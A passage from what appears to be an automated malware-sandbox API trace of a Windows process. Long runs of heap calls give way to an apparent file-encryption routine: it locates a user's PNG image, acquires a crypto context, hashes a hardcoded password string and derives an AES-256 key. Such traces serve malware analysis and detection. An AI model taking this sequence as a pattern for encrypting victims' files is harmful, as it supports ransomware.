(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.621] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.623] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.623] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.624] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0094.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0094.626] CloseHandle (hObject=0x298) returned 1 [0094.627] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.627] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0094.627] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae77f70, ftCreationTime.dwHighDateTime=0x1d5e5bc, ftLastAccessTime.dwLowDateTime=0xf924a990, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0xf924a990, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0xc97b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="OjV9.png", cAlternateFileName="")) returned 0x41ac6c0 [0094.627] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0094.627] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.627] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.627] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0094.627] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.627] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0094.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0094.628] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0094.629] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0094.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.629] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0094.629] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.641] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0094.641] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0094.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.642] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0094.642] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0094.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0094.642] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0094.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0094.643] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, 